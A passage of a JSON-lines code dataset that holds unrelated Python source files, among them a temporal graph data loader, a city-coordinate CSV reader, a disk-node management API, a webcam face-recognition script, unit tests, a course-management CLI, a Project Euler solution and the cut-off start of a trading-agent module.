label_list):\n self.src_idx_list = src_idx_list\n self.dst_idx_list = dst_idx_list\n self.ts_list = ts_list\n self.e_type_list = e_type_list\n self.label_list = label_list\n self.rand_sampler = RandEdgeSampler(src_idx_list, dst_idx_list)\n\n\nclass RandEdgeSampler(object):\n def __init__(self, src_list, dst_list):\n self.src_list = np.unique(src_list)\n self.dst_list = np.unique(dst_list)\n\n def sample(self, size):\n src_index = np.random.randint(0, len(self.src_list), size)\n dst_index = np.random.randint(0, len(self.dst_list), size)\n return self.src_list[src_index], self.dst_list[dst_index]\n\n\nclass FeatureGen():\n\n def __init__(self, uniform=True, device=\"cpu\"):\n self.uniform = uniform\n self.device = device\n self.num_nodes = None\n self.num_relations = None\n pass\n\n def prepare_loader(self, g_df, batch_size, valid_batch_size):\n\n train_graph_data, val_graph_data, test_graph_data, new_node_val_graph_data, \\\n new_node_test_graph_data, train_graph, full_graph = self.split_data(g_df)\n\n train_dataset = TGATDataset(train_graph_data, train_graph, mode=\"train\", device=self.device)\n val_dataset = TGATDataset(val_graph_data, full_graph, mode=\"valid\", device=self.device)\n nn_val_dataset = TGATDataset(new_node_val_graph_data, full_graph, mode=\"valid_new_node\", device=self.device)\n\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, collate_fn=train_dataset.collate_fn)\n val_dataloader = DataLoader(val_dataset, batch_size=valid_batch_size, collate_fn=val_dataset.collate_fn)\n nn_val_dataloader = DataLoader(nn_val_dataset, batch_size=valid_batch_size, collate_fn=nn_val_dataset.collate_fn)\n\n return train_dataloader, val_dataloader, nn_val_dataloader\n\n def split_data(self, g_df):\n\n val_time, test_time = list(np.quantile(g_df.timestamp, [0.70, 0.85]))\n\n src_idx_list = g_df.srcId.values\n dst_idx_list = g_df.dstId.values\n e_type_list = g_df.eType.values\n label_list = g_df.label.values\n ts_list = g_df.timestamp.values\n\n total_node_set = set(np.unique(np.hstack([g_df.srcId.values, g_df.dstId.values])))\n self.num_relations = len(set(e_type_list))\n\n max_idx = max(src_idx_list.max(), dst_idx_list.max())\n self.num_nodes = max_idx+1\n\n # random selected 10% of nodes from the validation+test sets\n mask_node_set = set(\n random.sample(set(src_idx_list[ts_list > val_time]).union(set(dst_idx_list[ts_list > val_time])),\n int(0.1 * self.num_nodes)))\n mask_src_flag = g_df.srcId.map(lambda x: x in mask_node_set).values\n mask_dst_flag = g_df.dstId.map(lambda x: x in mask_node_set).values\n none_new_node_flag = (1 - mask_src_flag) * (1 - mask_dst_flag) # 两边都不包含new node set\n\n train_flag = (ts_list <= val_time) * (none_new_node_flag > 0)\n\n train_src_list = src_idx_list[train_flag]\n train_dst_list = dst_idx_list[train_flag]\n train_ts_list = ts_list[train_flag]\n train_e_type_list = e_type_list[train_flag]\n train_label_list = label_list[train_flag]\n train_graph_data = GraphData(train_src_list, train_dst_list, train_ts_list, train_e_type_list, train_label_list)\n\n # define the new nodes sets for testing inductiveness of the model\n train_node_set = set(train_src_list).union(train_dst_list)\n assert (len(train_node_set - mask_node_set) == len(train_node_set))\n new_node_set = total_node_set - train_node_set\n\n # select validation and test dataset\n val_flag = (ts_list <= test_time) * (ts_list > val_time)\n test_flag = ts_list > test_time\n\n is_new_node_edge = np.array([(a in new_node_set or b in new_node_set) for a, b in zip(src_idx_list, dst_idx_list)])\n new_node_val_flag = val_flag * is_new_node_edge\n new_node_test_flag = test_flag * is_new_node_edge\n\n # validation and test with all edges\n val_src_list = src_idx_list[val_flag]\n val_dst_list = dst_idx_list[val_flag]\n val_ts_list = ts_list[val_flag]\n val_e_type_list = e_type_list[val_flag]\n val_label_list = label_list[val_flag]\n val_graph_data = GraphData(val_src_list, val_dst_list, val_ts_list, val_e_type_list, val_label_list)\n\n test_src_list = src_idx_list[test_flag]\n test_dst_list = dst_idx_list[test_flag]\n test_ts_list = ts_list[test_flag]\n test_e_type_list = e_type_list[test_flag]\n test_label_list = label_list[test_flag]\n test_graph_data = GraphData(test_src_list, test_dst_list, test_ts_list, test_e_type_list, test_label_list)\n\n # validation and test with edges that at least has one new node (not in training set)\n new_node_val_src_list = src_idx_list[new_node_val_flag]\n new_node_val_dst_list = dst_idx_list[new_node_val_flag]\n new_node_val_ts_list = ts_list[new_node_val_flag]\n new_node_val_e_type_list = e_type_list[new_node_val_flag]\n new_node_val_label_list = label_list[new_node_val_flag]\n new_node_val_graph_data = GraphData(new_node_val_src_list, new_node_val_dst_list, new_node_val_ts_list, new_node_val_e_type_list, new_node_val_label_list)\n\n new_node_test_src_list = src_idx_list[new_node_test_flag]\n new_node_test_dst_list = dst_idx_list[new_node_test_flag]\n new_node_test_ts_list = ts_list[new_node_test_flag]\n new_node_test_e_type_list = e_type_list[new_node_test_flag]\n new_node_test_label_list = label_list[new_node_test_flag]\n new_node_test_graph_data = GraphData(new_node_test_src_list, new_node_test_dst_list, new_node_test_ts_list, new_node_test_e_type_list, new_node_test_label_list)\n\n train_kg = pd.DataFrame({\"h\":train_graph_data.src_idx_list, \"t\":train_graph_data.dst_idx_list, \"r\":train_graph_data.e_type_list, \"timestamp\":train_graph_data.ts_list})\n train_graph = Graph(train_kg, fan_outs=[15, 15], device=self.device)\n\n # full graph with all the data for the test and validation purpose\n full_kg = pd.DataFrame({\"h\":src_idx_list, \"t\":dst_idx_list, \"r\":e_type_list, \"timestamp\":ts_list})\n full_graph = Graph(full_kg, fan_outs=[15, 15], device=self.device)\n\n return train_graph_data, val_graph_data, test_graph_data, new_node_val_graph_data, \\\n new_node_test_graph_data, train_graph, full_graph\n\n\nclass TGATDataset(Dataset):\n\n def __init__(self, graph_data, graph, mode=\"train\", device=\"cpu\"):\n super().__init__()\n self.mode = mode\n self.device = device\n self.src_idx_list = graph_data.src_idx_list\n self.dst_idx_list = graph_data.dst_idx_list\n self.ts_list = graph_data.ts_list\n self.label_list = graph_data.label_list\n self.rand_sampler = graph_data.rand_sampler\n self.ngh_finder = graph\n\n def __getitem__(self, index):\n src_l_cut, dst_l_cut = self.src_idx_list[index], self.dst_idx_list[index]\n ts_l_cut = self.ts_list[index]\n label_l_cut = self.label_list[index]\n return src_l_cut, dst_l_cut, ts_l_cut, label_l_cut\n\n def collate_fn(self, batch):\n src_list, dst_list, ts_list, label_list = zip(*batch)\n src_list_fake, dst_list_fake = self.rand_sampler.sample(len(src_list))\n return np.array(src_list), np.array(dst_list), np.array(ts_list), \\\n np.array(src_list_fake), np.array(dst_list_fake)\n\n def __len__(self):\n return len(self.src_idx_list)","sub_path":"dao/tgat_data_loader_dgl.py","file_name":"tgat_data_loader_dgl.py","file_ext":"py","file_size_in_byte":7881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455592702","text":"import unittest\n# found this playlist useful for this and python in general: https://www.youtube.com/watch?v=YYXdXT2l-Gg&list=PL-osiE80TeTskrapNbzXhwoFUiLCjGgY7\n# and this videos in particular was good: https://www.youtube.com/watch?v=q5uM4VKywbA\nimport csv # this is to read in the csv file\n\n# Create a class to hold a city location. Call the class \"City\". It should have\n# fields for name, latitude, and longitude.\n\n\n# City class with name, lat and lon fields to hold the city name the latitude and the longditude\nclass City:\n def __init__(self, name, lat, lon):\n self.name = name\n self.lat = lat\n self.lon = lon\n\n\n# We have a collection of US cities with population over 750,000 stored in the\n# file \"cities.csv\". (CSV stands for \"comma-separated values\".)\n#\n# Use Python's built-in \"csv\" module to read this file so that each record is\n# imported into a City instance. (You're free to add more attributes to the City\n# class if you wish, but this is not necessary.) Google \"python 3 csv\" for\n# references and use your Google-fu for other examples.\n#\n# Store the instances in the \"cities\" list, below.\n#\n# Note that the first line of the CSV is header that describes the fields--this\n# should not be loaded into a City object.\n\ncities = []\n\n# opening the ciyies.csv file and reading in the data to a list\n# found this useful when thinking about this: https://www.youtube.com/watch?v=q5uM4VKywbA\n\nwith open('cities.csv') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n next(reader)\n for row in reader:\n cities.append(City(row[0], row[3], row[4]))\n\n# Print the list of cities (name, lat, lon), 1 record per line.\n\n# for in loop printing cities (name, lat, lon), 1 record per line\nfor city in cities:\n print(\"{}, {}, {}\".format(city.name, city.lat, city.lon))\n\n# *** STRETCH GOAL! ***\n#\n# Allow the user to input two points, each specified by latitude and longitude.\n# These points form the corners of a lat/lon square. Output the cities that fall\n# within this square.\n#\n# Be aware that the user could specify either a lower-left/upper-right pair of\n# coordinates, or an upper-left/lower-right pair of coordinates. Hint: normalize\n# the input data so that it's always one or the other (what is latMin, latMax?)\n# then search for cities.\n#\n# Example I/O:\n#\n# Enter lat1,lon1: 45,-100\n# Enter lat2,lon2: 32,-120\n# Albuquerque: (35.1055,-106.6476)\n# Riverside: (33.9382,-117.3949)\n# San Diego: (32.8312,-117.1225)\n# Los Angeles: (34.114,-118.4068)\n# Las Vegas: (36.2288,-115.2603)\n# Denver: (39.7621,-104.8759)\n# Phoenix: (33.5722,-112.0891)\n# Tucson: (32.1558,-110.8777)\n# Salt Lake City: (40.7774,-111.9301)\n\n# create a list of the first coordinate set using the list constructor and mapping over the input casting the input to float\nlatlon1 = list(map(float, input(\"Enter lat1,lon1: \").strip().split(\",\")))\n\n# create a list of the second coordinate set using the list constructor and mapping over the input casting the input to float\nlatlon2 = list(map(float, input(\"Enter lat2,lon2: \").strip().split(\",\")))\n\n# use sorted() for normalization normalize the lats and the lons\nlats = sorted([latlon1[0], latlon2[0]])\nlons = sorted([latlon1[1], latlon2[1]])\n\n# set the data using a list comprehension outputting the result to the console\n[print(\"{}: ({},{})\\n\".format(c.name, c.lat, c.lon)) for c in cities if lats[0] <= float(\n c.lat) <= lats[1] and lons[0] <= float(c.lon) <= lons[1]]\n\n### STRETCH COMPLETE ###\n","sub_path":"GIT-USERS/TOM2/Sprint-Challenge--Intro-Python/src/cityreader.py","file_name":"cityreader.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"470561071","text":"import uuid\n\nfrom vda.common.constant import Constant\nfrom vda.grpc import portal_pb2\nfrom vda.common.modules import DiskNode\nfrom vda.common.syncup import syncup_dn, SyncupCtx\n\n\ndef create_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn_id = uuid.uuid4().hex\n dn_name = request.dn_name\n\n dn = DiskNode(\n dn_id=dn_id,\n dn_name=dn_name,\n dn_listener_conf=request.dn_listener_conf,\n online=request.online,\n location=request.location,\n hash_code=request.hash_code,\n version=0,\n error=True,\n error_msg=Constant.UNINIT_MSG,\n )\n session.add(dn)\n session.commit()\n\n syncup_ctx = SyncupCtx(session=session, req_id=req_id)\n syncup_dn(dn.dn_id, syncup_ctx)\n\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.CreateDnReply(reply_info=reply_info)\n\n\ndef delete_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .with_lockmode(\"update\") \\\n .one()\n session.delete(dn)\n session.commit()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.DeleteDnReply(reply_info=reply_info)\n\n\ndef modify_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .with_lockmode(\"update\") \\\n .one()\n attr = request.WhichOneof(\"attr\")\n if attr == \"new_online\":\n dn.online = request.new_online\n elif attr == \"new_hash_code\":\n dn.hash_code = request.new_hash_code\n else:\n assert(False)\n session.add(dn)\n session.commit()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n return portal_pb2.ModifyDnReply(reply_info=reply_info)\n\n\ndef list_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n query = session.query(DiskNode)\n if request.offset:\n query = query.offset(request.offset)\n if request.limit:\n query = query.limit(request.limit)\n if request.set_online:\n query = query.filter_by(online=request.online)\n if request.set_location:\n query = query.filter_by(location=request.location)\n if request.set_hash_code:\n query = query.filter_by(hash_code=request.hash_code)\n if request.set_error:\n query = query.filter_by(error=request.error)\n dns = query.all()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n dn_msg_list = []\n for dn in dns:\n dn_msg = portal_pb2.DnMsg(\n dn_id=dn.dn_id,\n dn_name=dn.dn_name,\n dn_listener_conf=dn.dn_listener_conf,\n online=dn.online,\n location=dn.location,\n hash_code=dn.hash_code,\n version=dn.version,\n error=dn.error,\n error_msg=dn.error_msg,\n )\n dn_msg_list.append(dn_msg)\n return portal_pb2.ListDnReply(\n reply_info=reply_info, dn_msg_list=dn_msg_list)\n\n\ndef get_dn(request, portal_ctx):\n session = portal_ctx.session\n req_id = portal_ctx.req_id\n dn = session \\\n .query(DiskNode) \\\n .filter_by(dn_name=request.dn_name) \\\n .one()\n reply_info = portal_pb2.PortalReplyInfo(\n req_id=req_id,\n reply_code=0,\n reply_msg=\"success\",\n )\n dn_msg = portal_pb2.DnMsg(\n dn_id=dn.dn_id,\n dn_name=dn.dn_name,\n dn_listener_conf=dn.dn_listener_conf,\n online=dn.online,\n location=dn.location,\n hash_code=dn.hash_code,\n version=dn.version,\n error=dn.error,\n error_msg=dn.error_msg,\n )\n pd_name_list = []\n for pd in dn.pds:\n pd_name_list.append(pd.pd_name)\n return portal_pb2.GetDnReply(\n reply_info=reply_info,\n dn_msg=dn_msg,\n pd_name_list=pd_name_list,\n )\n","sub_path":"vda/portal/disk_node.py","file_name":"disk_node.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"534710731","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: abhilash\n\"\"\"\n\n# importing the required libraries\nimport cv2\nimport face_recognition\nfrom flask import Flask\n\n#convert to web app\napp = Flask(__name__)\n\n\n# capture the video from default camera\nwebcam_video_stream = cv2.VideoCapture(0)\n\n#sapue edit\nsapue_image = face_recognition.load_image_file('ImagesAttendance/Sapue.jpg')\nsapue_face_encodings = face_recognition.face_encodings(sapue_image)[0]\n\nknown_face_encodings = [sapue_face_encodings]\nknown_face_name = [\"Sapuan\"]\n\n\n\n# initialize the array variable to hold all face locations in the frame\n#sapeu edit\nall_face_locations = []\nall_face_encodings = []\nall_face_names = []\n\n\n# loop through every frame in the video\nwhile True:\n # get the current frame from the video stream as an image\n ret, current_frame = webcam_video_stream.read()\n # resize the current frame to 1/4 size to proces faster\n current_frame_small = cv2.resize(current_frame, (0, 0), fx=0.25, fy=0.25)\n # detect all faces in the image\n # arguments are image,no_of_times_to_upsample, model\n all_face_locations = face_recognition.face_locations(current_frame_small, number_of_times_to_upsample=1,\n model='hog')\n\n #sapue edit\n\n all_face_encodings = face_recognition.face_encodings(current_frame_small, all_face_locations)\n print('There are {} no of the faces in this image'.format(len(all_face_locations)))\n\n # looping through the face locations and the face embeddings\n for current_face_location, current_face_encoding in zip(all_face_locations, all_face_encodings):\n # splitting the tuple to get the four position values of current face\n top_pos, right_pos, bottom_pos, left_pos = current_face_location\n top_pos = top_pos * 4\n right_pos = right_pos * 4\n bottom_pos = bottom_pos * 4\n left_pos = left_pos * 4\n\n # find all the matches and get the list of matches\n all_matches = face_recognition.compare_faces(known_face_encodings, current_face_encoding)\n\n # string to hold the label\n name_of_person = 'Unknown face'\n\n # check if the all_matches have at least one item\n # if yes, get the index number of face that is located in the first index of all_matches\n # get the name corresponding to the index number and save it in name_of_person\n if True in all_matches:\n first_match_index = all_matches.index(True)\n name_of_person = known_face_name[first_match_index]\n\n # draw rectangle around the face\n cv2.rectangle(current_frame, (left_pos, top_pos), (right_pos, bottom_pos), (255, 0, 0), 2)\n\n # display the name as text in the image\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(current_frame, name_of_person, (left_pos, bottom_pos), font, 0.5, (255, 255, 255), 1)\n\n # display the image\n cv2.imshow(\"Webcam Video\", current_frame)\n\n cv2.waitKey(1)\n\n\n\n\nwebcam_video_stream.release()\ncv2.destroyAllWindows()\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125753787","text":"\n\nfrom xai.brain.wordbase.verbs._shamble import _SHAMBLE\n\n#calss header\nclass _SHAMBLING(_SHAMBLE, ):\n\tdef __init__(self,): \n\t\t_SHAMBLE.__init__(self)\n\t\tself.name = \"SHAMBLING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"shamble\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_shambling.py","file_name":"_shambling.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"517003332","text":"from _wagyu import Box\nfrom hypothesis import given\n\nfrom tests.utils import (equivalence,\n implication)\nfrom . import strategies\n\n\n@given(strategies.boxes)\ndef test_reflexivity(box: Box) -> None:\n assert box == box\n\n\n@given(strategies.boxes, strategies.boxes)\ndef test_symmetry(first_box: Box,\n second_box: Box) -> None:\n assert equivalence(first_box == second_box,\n second_box == first_box)\n\n\n@given(strategies.boxes, strategies.boxes,\n strategies.boxes)\ndef test_transitivity(first_box: Box,\n second_box: Box,\n third_box: Box) -> None:\n assert implication(first_box == second_box\n and second_box == third_box,\n first_box == third_box)\n\n\n@given(strategies.boxes, strategies.boxes)\ndef test_connection_with_inequality(first_box: Box,\n second_box: Box) -> None:\n assert equivalence(not first_box == second_box,\n first_box != second_box)\n","sub_path":"tests/binding_tests/box_tests/test_equals.py","file_name":"test_equals.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"26090157","text":"\"\"\"\nETAPE 1.5: Restructurer les données\n\"\"\"\n\nimport json\nimport re\n\ndata = None\nwith open('../etape_1/hom.od_eng.json', 'r') as f:\n data = json.load(f)\n\n# Récupérer les infos importantes\ntitle = data.get('TEI.2', {}).get('teiHeader', {}).get(\n 'fileDesc', {}).get('titleStmt', {}).get('title')\n\nauthor = data.get('TEI.2', {}).get('teiHeader', {}).get(\n 'fileDesc', {}).get('titleStmt', {}).get('author')\n\ndiv = data.get('TEI.2', {}).get('text', {}).get(\n 'body', {}).get('div1')\n\n# Exportation des données restructurées\nwith open('./restructured_data.json', 'w') as f:\n json.dump({\n \"titre\": title,\n \"auteur\": author,\n \"donnees_textuelles\": [{\n \"n\": text_data.get(\"@n\"),\n \"texte\": re.sub(r\"–\", \"-\", text_data.get(\"p\"))\n } for text_data in div]\n }, f)\n","sub_path":"etape_2/restructure.py","file_name":"restructure.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181571641","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom PySide import QtGui\n\n\nclass MainWindow(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n\n ui_hello_lbl = QtGui.QLabel('Hello, World!')\n ui_quit_btn = QtGui.QPushButton('Close Window')\n\n ui_quit_btn.released.connect(self.close)\n\n ui_vert_layout = QtGui.QVBoxLayout()\n ui_vert_layout.addStretch(1)\n ui_vert_layout.addWidget(ui_hello_lbl)\n ui_vert_layout.addWidget(ui_quit_btn)\n ui_vert_layout.addStretch(1)\n\n ui_main_layout = QtGui.QHBoxLayout()\n ui_main_layout.addStretch(1)\n ui_main_layout.addLayout(ui_vert_layout)\n ui_main_layout.addStretch(1)\n\n ui_quit_btn.setFocus()\n\n self.setLayout(ui_main_layout)\n self.setWindowTitle('Hello World Executable')\n\n\nif __name__ == '__main__':\n import sys\n\n app = QtGui.QApplication([])\n root = MainWindow()\n root.show()\n\n sys.exit(app.exec_())","sub_path":"python/qthelloworld.pyw","file_name":"qthelloworld.pyw","file_ext":"pyw","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"646178504","text":"import os\nimport sys\nimport pickle\nBasepath=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(Basepath)\nfrom conf import setting\nfrom lib import class_all\nfrom src import school_management\n\n\n\ndef pkl_load(pkl_path):\n with open(pkl_path, 'rb') as file:\n course = pickle.load(file)\n return course\n\ndef to_school(num,dict,file):\n pkl_course_path = setting.COURSEDB_PATH + '\\\\' + file\n course = pkl_load(pkl_course_path)\n course.course_append(dict[num].split('.')[0])\n course.save()\n pkl_school_path = setting.SCHOOLDB_PATH + '\\\\' + dict[num]\n school = pkl_load(pkl_school_path)\n school.course_append(file.split('.')[0])\n school.save()\n\n\n\ndef course_dic():\n '''课程对象列表'''\n course_dict = {}\n for i,v in enumerate(os.listdir(setting.COURSEDB_PATH),1):\n course_dict[str(i)]=v\n print('%s.%s'%(i,v.split('.')[0]))\n return course_dict\n\ndef course_query():\n '''访问课程'''\n tag = True\n while tag:\n course_dict = course_dic()\n cn_input = input('请输入要查询的课程编号(退出按q):').strip()\n if cn_input.isdigit() and cn_input in course_dict.keys():\n pkl_path = setting.COURSEDB_PATH + '\\\\' + course_dict[cn_input]\n with open(pkl_path, 'rb') as file:\n course = pickle.load(file)\n '''\n\n\n\n 功能完善\n\n\n\n '''\n print(course.info)\n elif cn_input.upper() == 'Q':\n tag = False\n else:\n print('请输入正确的值')\n continue\ndef course_create():\n '''创建课程'''\n tag=True\n while tag:\n cmd_input = input('���否创建新课程?(yes/no)').strip().upper()\n if cmd_input == 'YES':\n while tag:\n course_name = input('请输入课程名称:').strip()\n if not course_name:continue\n course_price = input('请输入课程价格:').strip()\n if not course_price:continue\n course_period = input('请输入课程周期:').strip()\n if not course_period:continue\n if not (course_name >= u'\\u4e00' and course_name <= u'\\u9fa5') and not course_name.isdigit():\n if course_price.isdigit() and course_period.isdigit():\n course=class_all.Course(course_name,course_price,course_period)\n print('%s Course creat successful...' %(course.name.title()))\n course.save()\n print(course.info)\n print('')\n tag = False\n else:\n print('课程价格或课程周期格式输入错误')\n continue\n # while tag:\n # yes_no = input('是否关联教师?(yes/no)').strip()\n # if yes_no.upper() == 'YES':\n # course_teacher=input('请输入教师名字:').strip().title()\n # teacher_list=os.listdir(setting.TEACHERDB_PATH)\n # if teacher_list and course_teacher+'.pkl' in teacher_list:\n # '''================'''\n # print('guanlian')\n # tag=False\n # '''================'''\n # else:\n # print('没有找到该老师信息,无法关联')\n # tag=False\n # elif yes_no.upper() == 'NO':\n # tag=False\n # else:\n # continue\n tag=True\n while tag:\n yes_no = input('是否关联学校?(yes/no)').strip()\n if yes_no.upper() == 'YES':\n school_dict = school_management.school_dic()\n course_pkl = course_name + '.pkl'\n sn_input = input('请输入要关联的学校的编号(退出按q):').strip()\n to_school(sn_input, school_dict, course_pkl)\n tag=False\n elif yes_no.upper() == 'NO':\n tag=False\n else:\n continue\n else:\n print('课程名称格式输入错误')\n elif cmd_input == 'NO':\n print(\"退出\")\n tag=False\n else:\n print('请输入正确的选项')\ndef course_delete():\n '''删除课程,漏洞:关联的对象列表中的数据未更新'''\n tag = True\n while tag:\n course_dict = course_dic()\n if course_dict:\n cn_input = input('请输入要删除的课程编号(退出按q):').strip()\n if cn_input.isdigit():\n os.remove(setting.COURSEDB_PATH+'\\\\'+course_dict[cn_input])\n course_dict.pop(cn_input)\n elif cn_input.upper() == 'Q':\n tag = False\n else:\n continue\n else:\n print('当前没有课程')\n tag=False\ndef course_to_teacher():\n pass\ndef course_to_student():\n pass\ndef course_to_school():\n '''课程关联学校'''\n tag = True\n while tag:\n course_dict = course_dic()\n if course_dict:\n cn_input = input('请输入要关联学校的课程编号(退出按q):').strip()\n if cn_input.isdigit() and cn_input in course_dict.keys():\n school_dict=school_management.school_dic()\n elif cn_input.upper() == 'Q':\n tag = False\n continue\n else:\n continue\n sn_input = input('请输入要关联的学校的编号(退出按q):').strip()\n if sn_input.isdigit() and sn_input in school_dict.keys():\n to_school(sn_input, school_dict, course_dict[cn_input])\n tag = False\n elif sn_input.upper() == 'Q':\n tag = False\n continue\n else:\n print('当前没有课程')\n tag=False\ndef course_init():\n '''课程初始化'''\n if not os.listdir(setting.COURSEDB_PATH):\n print('当前还没有创建任何课程')\n course_create()\ndef course_func_dic():\n course_func_dict = {}\n print('======家里蹲大学校区管理======')\n print('%s.访问课程' % ('1'))\n course_func_dict['1'] = course_query\n print('%s.新建课程' % ('2'))\n course_func_dict['2'] = course_create\n print('%s.删除课程' % ('3'))\n course_func_dict['3'] = course_delete\n print('%s.关联教师' % ('4'))\n course_func_dict['4'] = course_to_teacher\n print('%s.关联学生' % ('5'))\n course_func_dict['5'] = course_to_student\n print('%s.关联学校' % ('6'))\n course_func_dict['6'] = course_to_school\n print('%s.退出' % ('7'))\n return course_func_dict\n\ndef course_man():\n '''校区管理'''\n while True:\n course_func=course_func_dic()\n cmd_input=input('请输入功能代码(1-7):').strip()\n if cmd_input.isdigit() and cmd_input in course_func.keys():\n course_func[cmd_input]()\n elif cmd_input == '7':\n break\n print('')\n\n\nif __name__ == '__main__':\n def run():\n course_init()\n course_man()\n run()\n","sub_path":"D20170707ChoseCourseHomeWork/cll选课系统/src/course_management.py","file_name":"course_management.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378394890","text":"from flask import Blueprint, redirect, render_template, request, url_for\nfrom flask_login import current_user\n\nfrom dawdle.components.contact.forms import ContactForm\nfrom dawdle.components.contact.utils import send_contact_emails\n\ncontact_bp = Blueprint('contact', __name__, url_prefix='/contact')\n\n\n@contact_bp.route('/')\ndef index_GET():\n return render_template(\n 'contact/index.html',\n form=ContactForm(request.form, obj=current_user),\n )\n\n\n@contact_bp.route('/', methods=['POST'])\ndef index_POST():\n form = ContactForm(request.form, obj=current_user)\n\n if not form.validate_on_submit():\n return render_template('contact/index.html', form=form), 400\n\n sent_email = send_contact_emails(\n email=form.email.data,\n subject=form.subject.data,\n message=form.message.data,\n )\n\n if not sent_email:\n return render_template('contact/index.html', form=form), 500\n\n return redirect(url_for('contact.index_GET'))\n","sub_path":"legacy/dawdle/components/contact/blueprints.py","file_name":"blueprints.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"268701065","text":"\n# project euler\n# problem 92\n# Square digit chains\n\nmem = [0 for i in range(1000)]\nsq = [i**2 for i in range(10)]\nsolution = [None for i in range(1000)]\nlim = 1000\n\ndef sq_sum(n):\n sum = 0\n while n is not 0:\n sum += (sq[n%10])\n n//=10\n\n return sum\n\ndef check(n):\n global solution\n global mem\n global lim\n if n>=lim:\n n = sq_sum(n)\n\n if n is 89:\n return True\n elif n is 1:\n return False\n\n if solution[n] is None:\n solution[n] = check(n)\n return solution[n]\n else:\n return solution[n]\n\n# def check(n):\n# global lim\n# l = [n]\n# succ = False\n \n# if n >= lim:\n# n = sq_sum(n)\n# l.append(n)\n\n# while n is not 89 and n is not 1:\n \n# if solution[n] is not None:\n# succ = solution[n]\n# break\n# if mem[n] is 0:\n# mem[n] = sq_sum(n)\n# n = mem[n]\n\n# l.append(n)\n# l.append(n)\n\n# if n==89:\n# succ = True\n\n# for i in l:\n# if i < lim:\n# solution[i] = succ\n\n# return succ\n\nans = 0\nfor i in range(1, 1000000):\n if check(i):\n ans += 1\n # print(i)\n\nprint(ans)","sub_path":"PROJEULER/p92.py","file_name":"p92.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"647370947","text":"\nclass MobileNotification:\n def __init__(self, index, action, app_package, category, posted_time_of_day):\n self.index = index\n self.action = action\n self.appPackage = app_package\n self.category = category\n self.postedTimeOfDay = posted_time_of_day\n\n def __str__(self):\n rep = \"Notification {} (Action: {}, Package: {}, Category: {}, TimeOfDay: {})\"\\\n .format(self.index, self.action, self.appPackage, self.category, self.postedTimeOfDay)\n return rep\n","sub_path":"gym_notif/envs/mobile_notification.py","file_name":"mobile_notification.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339787457","text":"\"\"\"\nCopyright (c) 2021, Shashwat Saxena.\n\nThis module provides the helper functions and the class XAssetAgent, a reinforcement learning agent which will make\ntrading decisions based on LOBSTERReader data.\n\"\"\"\n\n######\n# Imports\n######\nfrom typing import List\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom lobpy.datareader.lobster import *\nfrom scipy.interpolate import interp1d\n\nimport time as t\n\n\nclass AgentState:\n \"\"\"\n State object specified for categorizing limit order book orders\n ----------\n params:\n limit order book dataframe,\n agent quantity,\n agent cash\n\n\n Example usage:\n to create a state with agent cash and inventory\n >>> agent = AgentState(pd.DataFrame([1000, 1010]), 1, 500)\n to create a state from the reader itself\n >>> agents = AgentState(reader, 1, 500)\n \"\"\"\n\n def __init__(self,\n mid_price: float,\n agent_position: float,\n agent_cash: float,\n time_to_eod: float,\n qty_high_bound: float,\n qty_low_bound: float,\n sig_fig: float = 0.0001,\n lo_intensity_bid: float = 